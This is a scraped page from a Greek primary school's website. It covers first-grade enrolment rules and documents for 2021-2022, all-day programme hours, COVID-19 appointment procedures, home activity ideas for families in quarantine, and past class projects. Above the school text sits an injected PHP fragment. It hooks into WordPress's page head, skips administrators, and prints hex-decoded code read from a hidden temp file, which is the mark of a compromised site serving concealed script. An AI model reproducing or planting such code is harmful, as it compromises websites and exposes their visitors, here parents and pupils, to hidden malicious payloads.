if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Χωρίς κατηγορία |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Χωρίς κατηγορία

Εγγραφές μαθητών στην Α’ τάξη για το Σχολ. Έτος 2021-2022

Σας ενημερώνουμε ότι από την τρέχουσα χρονιά οι εγγραφές των μαθητών στην Α’ τάξη του δημοτικού θα πραγματοποιούνται από την 1/3 έως και την 20/3 κάθε έτους. Οι εγγραφές λοιπόν των μαθητών που θα φοιτήσουν στην Α’ τάξη κατά το σχολ. έτος 2021-2022 θα πραγματοποιηθούν φέτος από τη 1/3/2021 έως και τις 20/3/2021.
Κατά το σχολικό έτος 2021-2022 στην Α’ Τάξη του Δημοτικού Σχολείου θα φοιτήσουν οι μαθητές/τριες που γεννήθηκαν από 1-1-2015 έως και 31-12-2015.
Οι αιτήσεις για εγγραφή στο Ολοήμερο θα γίνουν δεκτές όλες χωρίς προϋποθέσεις.

ΔΙΚΑΙΟΛΟΓΗΤΙΚΑ ΕΓΓΡΑΦΩΝ

Οι γονείς και κηδεμόνες υποβάλλουν σχετικές αιτήσεις-υπεύθυνες δηλώσεις εγγραφής στο δημοτικό σχολείο που ανήκουν σύμφωνα με τα όρια της σχολικής περιφέρειας, προσκομίζοντας τα κάτωθι δικαιολογητικά:

α. Πιστοποιητικό γέννησης Δήμου ή Κοινότητας. (ΔΕ ΘΑ ΠΡΟΣΚΟΜΙΣΤΕΙ ΑΠΟ ΤΟΥΣ ΓΟΝΕΙΣ. ΘΑ ΠΑΡΑΛΗΦΘΕΙ ΑΠΟ ΤΟΝ ΔΗΜΟ ΗΛΕΚΤΡΟΝΙΚΑ)

β. Βιβλιάριο Εμβολίων του/της μαθητή/τριας, ή προσκόμιση άλλου στοιχείου, από το οποίο αποδεικνύεται ότι έγιναν τα εμβόλια που προβλέπονται και είναι ενταγμένα στο Εθνικό Πρόγραμμα Εμβολιασμών.

γ. Το Ατομικό Δελτίο Υγείας Μαθητή (οι ενδιαφερόμενοι λαμβάνουν το έντυπο από το νηπιαγωγείο ή το σχολείο μας και το συμπληρώνει ιατρός)

δ. Αποδεικτικό στοιχείο από το οποίο διαπιστώνεται η διεύθυνση κατοικίας του μαθητή/τριας (λογαριασμός ΔΕΗ/ΟΤΕ/ΕΥΔΑΠ ή εκκαθαριστικό εφορίας ή συμβόλαιο οικίας κλπ)

ε. Βεβαίωση Φοίτησης Νηπιαγωγείου και Πιστοποιητικό Φοίτησης Νηπιαγωγείου για την εγγραφή στο Δημοτικό. (ΔΕ ΘΑ ΠΡΟΣΚΟΜΙΣΤΟΥΝ ΑΠΟ ΤΟΥΣ ΓΟΝΕΙΣ. ΘΑ ΠΑΡΑΛΗΦΘΟΥΝ ΑΠΟ ΤΟ ΝΗΠΙΑΓΩΓΕΙΟ ΕΝΔΟΫΠΗΡΕΣΙΑΚΑ)

Στην περίπτωση μαθητών με αναπηρία και ειδικές εκπαιδευτικές ανάγκες, οι γονείς και κηδεμόνες συνυποβάλλουν γνωμάτευση από Κ.Ε.Σ.Υ. ή δημόσιο ιατροπαιδαγωγικό κέντρο ή άλλη αρμόδια δημόσια υπηρεσία, χωρίς αυτή να αποτελεί προϋπόθεση εγγραφής.

Εγγραφή στο Ολοήμερο

Οι μαθητές/τριες εγγράφονται στο Ολοήμερο Πρόγραμμα κατόπιν σχετικής αίτησης-δήλωσης των γονέων/κηδεμόνων τους (έντυπο που θα δοθεί από το σχολείο). Θα γίνουν δεκτές όλες ανεξαιρέτως οι αιτήσεις των γονέων/κηδεμόνων για φοίτηση των μαθητών/τριών στο Ολοήμερο Πρόγραμμα, χωρίς προϋποθέσεις.

Η αποχώρηση των μαθητών/τριών του Ολοήμερου Προγράμματος πραγματοποιείται στις 16:00.

Ενδιάμεση αποχώρηση των μαθητών/τριών μπορεί να γίνεται μετά το τέλος της 2ης ώρας του Ολοήμερου Προγράμματος (15:00), εφόσον κατατεθεί σχετική ενυπόγραφη δήλωση των γονέων/κηδεμόνων.

Προϋπόθεση συμμετοχής μαθητών/τριών στο τμήμα Πρωινής Ζώνης (7:00-8:00)

Στο τμήμα αυτό δικαίωμα έχουν μαθητές/τριες οι οποίοι είναι εγγεγραμμένοι/νες και φοιτούν στο ολοήμερο πρόγραμμα.
Αιτήσεις εγγραφής δύνανται να υποβάλλουν και γονείς ή κηδεμόνες που διαμένουν εκτός σχολικής περιφέρειας, εφόσον στο σχολείο φοιτούν ήδη αδέλφια τού προς εγγραφή μαθητή.

ΠΡΟΣΟΧΗ: Εξαιτίας της δεδομένης κατάστασης του COVID-19 οι γονείς-κηδεμόνες των μαθητών θα προσέρχονται στο σχολείο έπειτα από προγραμματισμένο ραντεβού με τον Διευθυντή του σχολείου. Ο γονέας θα πρέπει να επικοινωνήσει πρώτα τηλεφωνικά με το σχολείο στο τηλέφωνο 2757022275 και ώρες 11.00- 12.00, προκειμένου να καθορισθεί συγκεκριμένη ημέρα και ώρα προσέλευσής του, με τήρηση των κανόνων προσωπικής προστασίας και τηρώντας το υγειονομικό πρωτόκολλο για την προστασία από τον COVID-19.

Δημοτικό Σχολείο Λεωνιδίου

Ενημέρωση από τον Ξενώνα Φιλοξενίας Γυναικών Θυμάτων Βίας του Δήμου Τρίπολης

ΔΡΑΣΤΗΡΙΟΤΗΤΕΣ ΓΙΑ ΜΑΘΗΤΕΣ ΚΑΙ ΓΟΝΕΙΣ ΣΤΗΝ ΕΠΟΧΗ ΤΗΣ ΚΑΡΑΝΤΙΝΑΣ

Πρακτικές προτάσεις δραστηριοτήτων για όλη την οικογένεια εντός του σπιτιού χωρισμένες σε κατηγορίες (κάποιες από τις κατηγορίες αλληλοκαλύπτονται)

 

Α) Δραστηριότητες εκτόνωσης – ενσυναίσθησης – εκδήλωσης συναισθημάτων  

  1. Κάντε γυμναστική. Η σωματική άσκηση είναι ωφέλιμη τόσο για το σώμα όσο και για την ψυχολογία μας. Βοηθά στο να παραμένουμε ήρεμοι ψυχικά και ενεργοί σωματικά. Επιλέξτε τον τύπο άσκησης που σας ταιριάζει ή οργανώστε ομαδικές δραστηριότητες
  2. Θεατρικό παιχνίδι για τον κορονοϊό, για παράδειγμα ένα από τα μέλη της οικογένειας παριστάνει τον κορονοϊό, χτυπάει την πόρτα του δωματίου του παιδιού παριστάνοντας ότι θέλει να μπει μέσα, πλησιάζει το παιδί κάνοντας ότι θέλει να το πάρει αγκαλιά, του απλώνει το χέρι για χειραψία, κυνηγάει το παιδί μέσα στο σπίτι. Ζητάμε από το παιδί να αντιδράσει σε όλα αυτά με τον κατάλληλο – παιγνιώδη τρόπο.
  3. Διοργανώνουμε βραδιές κάμπινγκ ή πικνίκ ή «στρωματσάδας» (στρώνουμε κουβέρτες στο πάτωμα και κοιμόμαστε όλοι μαζί λέγοντας παραμύθια ή ιστορίες ο ένας στον άλλον) σε διάφορα μέρη του σπιτιού (έχουμε μαγειρέψει μαζί το φαγητό και έχουμε προσαρμόσει τον χώρο του σπιτιού ανάλογα). Ζωγραφίζουμε το πλαστικό γάντι (που φοράμε για προφύλαξη) με φατσούλες συναισθημάτων (χαρούμενη, λυπημένη, θυμωμένη κ.τ.λ.), λέμε πώς αισθάνεται η κάθε φατσούλα και παίζουμε «δαχτυλοθέατρο».
  4. Δημιουργούμε μία κοινωνική ιστορία, για παράδειγμα ένα από τα μέλη της οικογένειας υποδύεται τον «νταή» του σχολείου και τα υπόλοιπα μέλη προσπαθούν να τον αντιμετωπίσουν. Ξεκινάμε φανταστικές ιστορίες που πρέπει να συνεχίσουν τα παιδιά, για παράδειγμα λέει ο καθένας από μία πρόταση για να φτιάξουμε όλοι μαζί μία ιστορία ή ένα παραμύθι.
  5. Φτιάχνουμε ένα παιχνίδι μυστηρίου, φαντασίας, παραδείγματος χάριν μεταφερόμαστε με μία χρονοκάψουλα τριάντα χρόνια μπροστά στον πλανήτη Άρη και φανταζόμαστε πώς θα είναι ο πλανήτης και τι συμβαίνει εκεί.
  6. Σκαρφιζόμαστε αστυνομικές ιστορίες με κλέφτες και αστυνόμους και τα παιδιά πρέπει να βρουν το κρυμμένο αντικείμενο μέσα στο σπίτι.
  7. Φοράμε επίσημο ένδυμα και διοργανώνουμε συναυλία χρησιμοποιώντας ως όργανα το σώμα μας ή τα κουζινικά του σπιτιού.
  8. Αλλάζουμε ρόλους με τους γονείς, για παράδειγμα για ορισμένο χρονικό διάστημα γίνονται τα παιδιά γονείς και οι γονείς παιδιά (συμβουλή: οι γονείς να αντιδρούν σαν να είναι πραγματικά παιδιά).
  9. Βάζουμε δυνατά μουσική και χορεύουμε και τραγουδάμε.
  10. Φτιάχνουμε τα δικά μας οικογενειακά τραγούδια.
  11. Παίζουμε παντομίμα με τίτλους από ταινίες, σειρές ή βιβλία.
  12. Χρησιμοποιούμε τα καλλυντικά της μαμάς για να βάψουμε αστεία τα πρόσωπά μας (όλοι μας, και ο μπαμπάς).
  13. Αλλάζουμε ρούχα μεταξύ μας ή χρησιμοποιούμε παλιές στολές από τις απόκριες.
  14. Παίζουμε μαξιλαροπόλεμο.

Β) Δραστηριότητες δεξιοτήτων  

  1. Ράβουμε μάσκες και τις ζωγραφίζουμε (μαθαίνουμε πώς και γιατί χρησιμοποιούμε μάσκες).
  2. Φτιάχνουμε καλτσόκουκλες και παίζουμε κουκλοθέατρο.
  3. Μαθαίνουμε στα παιδιά μας δουλειές του σπιτιού και τα παιδιά αναλαμβάνουν συγκεκριμένες καθημερινές αρμοδιότητες μέσα στο σπίτι.
  4. Μαγειρεύουμε και φτιάχνουμε γλυκά μαζί τους.
  5. Μαθαίνουμε να δένουμε τα κορδόνια μας, να λούζουμε τα μαλλιά μας, να κάνουμε μόνοι μας μπάνιο. Φτιάχνουμε κοσμήματα με μακαρόνια ή κολάζ με φακές, φασόλια, κοφτό μακαρονάκι, κομμάτια υφάσματος κ.τ.λ.
  6. Παίζουμε τυφλόμυγα με γεύση και αφή: κλείνουμε τα μάτια των παιδιών και τα βάζουμε να αγγίξουν ή να γευτούν και να ανακαλύψουν τι ήταν αυτό που άγγιξαν ή γεύτηκαν.
  7. Βάζουμε ήχους στο διαδίκτυο και βάζουμε τα παιδιά να μαντέψουν ποια είναι η πηγή του κάθε ήχου.

 

Γ) Δραστηριότητες γνώσεων – μαθησιακές  

 

  1. Παίζουμε κρεμάλα. Ψάχνουμε λέξεις που να ξεκινούν από συγκεκριμένο γράμμα (π.χ. από «α») ή να τελειώνουν σε συγκεκριμένη κατάληξη (π.χ. σε –ος).Ψάχνουμε ουσιαστικά που βρίσκονται μέσα στο δωμάτιο. Δημιουργούμε ρήματα με τις πράξεις μας.
  2. Κανονίζουμε ώρες σιωπής και επικοινωνούμε μεταξύ μας μόνο με μηνύματα σε χαρτί (ορθογραφία – γραπτός λόγος).
  3. Φτιάχνουμε το οικογενειακό μας δέντρο, βρίσκουμε παλιές οικογενειακές φωτογραφίες, μιλάμε στα παιδιά μας για τους προγόνους τους και για τους τρόπους ζωής τα παλαιότερα χρόνια. Με αυτό τον τρόπο γνωρίζουν και την ιστορία του τόπου τους, καθώς και τις οικογενειακές τους ρίζες.
  4. Κάνουμε πειράματα φυσικής ή χημείας στην κουζίνα, για παράδειγμα κατασκευή ηφαιστείου που εκρήγνυται με κόκα κόλα και μέντα.
  5. Γίνονται τα παιδιά δάσκαλοι και διδάσκουν στους γονείς κάποιο μάθημα που έχουν διαβάσει (προσοχή: οι γονείς πρέπει να συμπεριφέρονται σαν να είναι παιδιά). Με αυτό τον τρόπο αυξάνουμε την ενσυναίσθηση και στα παιδιά και στους γονείς.
  6. Παίζουμε το μπακάλικο ή το περίπτερο και μαθαίνουμε στα παιδιά να διαχειρίζονται τα χρήματα.
  7. Παίζουμε συνώνυμα – αντίθετα – ετυμολογίες λέξεων.
  8. Παίζουμε όνομα – ζώο – φυτό – επάγγελμα – πράγμα.
  9. Βρίσκουμε στο διαδίκτυο γρίφους, αινίγματα και γλωσσοδέτες. Εμπλέκουμε τα παιδιά στη διαδικασία επίλυσής τους.

Μην ξεχνάτε πως οτιδήποτε συνηθισμένο αντικείμενο μέσα στο σπίτι μπορεί να χρησιμοποιηθεί για ασυνήθιστα και διασκεδαστικά παιχνίδια με τα παιδιά μας. Αφήστε τη φαντασία και τη δημιουργικότητά σας ελεύθερη, ξαναθυμηθείτε το παιδί που έχετε μέσα σας και δημιουργείστε τα δικά σας παιχνίδια μαζί με την οικογένειά σας.

 

 

Δημιουργήστε ένα καθημερινό πρόγραμμα της οικογένειας, φτιάξτε όλοι μαζί μια αφίσα με τις προτεινόμενες δραστηριότητες και το χρόνο εκτέλεσης τους. Μην αφήνετε το χρόνο να κυλά άσκοπα, τώρα που τα σχολεία είναι κλειστά. Γεμίστε την ημέρα σας με δραστηριότητες που σας ευχαριστούν και σας φέρνουν κοντά ως οικογένεια. Μην ξεχνάτε, το διάβασμα δε σταμάτησε, απλώς γίνεται στο σπίτι!

 

ΓΙΟΡΤΗ ΛΗΞΗΣ 2017-2018

ΜΙΚΡΑ ΒΙΝΤΕΟ ΓΙΟΡΤΗΣ: MOV02145 IMG_3968

Δυναμικός και στατικός τρόπος «σκέπτεσθαι»: Πώς συζητάμε με τους μαθητές μας/τα παιδιά μας;

ΠΑΡΟΥΣΙΑΣΗ

Δυναμικός και στατικός τρόπος «σκέπτεσθαι»: Πώς συζητάμε με τους μαθητές μας/τα παιδιά μας;

ΠΑΡΟΥΣΙΑΣΗ

Θέλουμε το χρώμα στη σχολική μας ζωή

Κύρια επιδίωξή μας, ως τμήμα μάθησης του δημόσιου εκπαιδευτικού συστήματος, ήταν να περνάμε όλοι ωραία στη σχολική μας καθημερινότητα. Θελήσαμε να διαμορφώσουμε ένα εκπαιδευτικό πλαίσιο όπου θα χαρακτηριζόταν από τη συμμετοχή όλων των μαθητών σε όλες τις δράσεις αλλά και από ένα δάσκαλο που θα άκουγε τις απόψεις των μαθητών, ακόμη και αυτών που δεν εκδηλώθηκαν ποτέ, και θα προσπαθούσε να κάνει καλύτερη τη ζωή των μαθητών στο σχολείο αλλά και θα επεδίωκε να τους κάνει να περιμένουν με χαρά να έρθουν στο σχολείο και όχι να περιμένουν πότε θα έρθει …το τέλος του σχολικού έτους για να γλυτώσουν.Έτσι μέσα σε όλες μας τις δράσεις αποφασίσαμε να βάλουμε και χρώμα στα τετράδιά μας και όχι μόνο να γράφουμε με ένα μαύρο μολύβι έννοιες, αριθμούς, ορισμούς και άλλα που πολλές φορές μας κάνουν ενδεχομένως τη μαθητική μας ζωή δύσκολη. Εμείς ως εκπαιδευτικοί ξέρουμε πολύ καλά ότι μπορούν οι μαθητές μας να μάθουν όλα αυτά που πρέπει μέσα από διαδικασίες ευχάριστες, σύγχρονες και κυρίως θελκτικές ως προς τη μάθηση. Ας διώξουμε τις παλιές πειθαναγκαστικές μεθόδους που προάγουν την παπαγαλία και την αναγκαστική εκμάθηση εννοιών και όρων.
Ο Δάσκαλος του Ε1 Ηλίας Βλάχος
ακολουθούν φωτογραφίες από τα τετράδια της φιλαναγνωσίας και της ελληνικής γλώσσας, όπου διακρίνονται τα κείμενα των μαθητών τα οποία αποτελούν και σε μερικές περιπτώσεις άγνωστη ορθογραφία (πριν τη διόρθωση).

Τελικά πόσο επικίνδυνη είναι η πλοήγηση στο Διαδίκτυο μπαμπά;

Μαρνέρης Αλέξανδρος ( ΠΕ 70)
Κολενδριανού Αργυρώ ( ΠΕ 70)
Τσισμαλίδου Μαρία ( ΠΕ 70)
Δ τάξη
Σχ.έτος 2014-15

Από το σιτάρι στο ψωμί!

Εκπαιδευτικό πρόγραμμα αγωγής υγείας
Πήλιουρα Βασιλική ΠΕ70
Αυγέρης Βασίλης ΠΕ70
Γ Τάξη
Σχ. έτος 2014-15

Φιλενάδα, Φουντουκιά μου!

Φιλαναγνωσία

Αυγέρης Βασίλειος ΠΕ70
Πήλιουρα Βασιλική ΠΕ70
Γ τάξη
Σχ. έτος 2014-15